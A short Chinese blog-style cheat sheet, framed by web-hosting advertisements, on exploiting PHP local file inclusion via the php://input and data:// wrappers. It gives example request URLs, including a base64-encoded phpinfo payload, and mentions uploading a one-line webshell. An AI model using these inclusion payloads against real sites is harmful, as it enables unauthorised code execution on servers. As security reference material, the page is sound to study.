条件:

创新互联主要从事成都网站设计、成都网站建设、外贸网站建设、网页设计、企业做网站、公司建网站等业务。立足成都服务松滋,十载网站建设经验,价格优惠、服务专业,欢迎来电咨询建站服务:13518219792

【条件】在allow_url_include = On 且 PHP >= 5.2.0

【优势】直接POST php代码并执行

【须知】必须使用包含切执行函数(比如 include require) 不能使用file_get_contents等 用这些函数不会执行data/input里面函数。

【点评】这其实是一种思路而已  当allow_url_include打开的时候  随便找个webshell上传一句话都可以远程包含了。

php://input

0x007.com/data.php?a=php://input

post提交:  任意的php代码

data:

include $_GET['a'];

0x007.com/data.php?a=data:text/plain,

0x007.com/data.php?a=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=

0x007.com/data.php?a=data:;base64,PD9waHBpbmZvKCk7Lyo=

另外有需要云服务器可以了解下创新互联scvps.cn，海内外云服务器15元起步，三天无理由+7*72小时售后在线，公司持有idc许可证，提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案，具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势，专为企业上云打造定制，能够满足用户丰富、多元化的应用场景需求。

网页标题：LFI命令执行-创新互联
文章来源：http://tyjierui.cn/article/posdo.html